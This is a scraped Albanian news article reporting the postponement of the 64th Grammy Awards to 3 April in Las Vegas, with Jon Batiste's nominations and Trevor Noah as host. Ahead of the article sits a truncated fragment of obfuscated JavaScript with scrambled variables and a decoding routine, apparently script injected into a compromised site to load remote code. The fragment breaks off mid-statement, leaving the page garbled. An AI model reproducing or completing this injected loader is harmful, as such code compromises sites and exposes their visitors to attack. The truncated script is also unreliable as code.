;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Shtyhet Grammy’s, shkak koronavirusi

By

Çmimet Grammy shtyhen për në muajin prill.

Ceremonia e 64 vjetore, e planifikuar fillimisht për 31 janar në Los Angeles, u shty për shkak të rritjes së rasteve me COVID-19. Tani ajo do të zhvillohet më 3 prill dhe do të transmetohet drejtpërdrejt nga kanali CBS. Po ashtu është hera e parë që Grammy mbahet në Las Vegas, njoftuan organizatorët.

New York Times shkruan se këtë vit kompozitori dhe drejtuesi i grupit Jon Batiste ka 11 nominime, më shumë se çdo artist tjetër, dhe do të konkurrojë si për albumin ashtu edhe për këngën e vitit.

Të tjerë të nominuar janë Olivia Rodrigo, Justin Bieber, Billie Eilish dhe Doja Cat.

Asnjë interpretues nuk është shpallur ende, por Trevor Noah do të kthehet si prezantes.

Vitin e kaluar, Grammy u shty me gjashtë javë dhe u mbajt kryesisht në ambiente të jashtme në qendër të Los Angelesit.

Artikuj të ngjashëm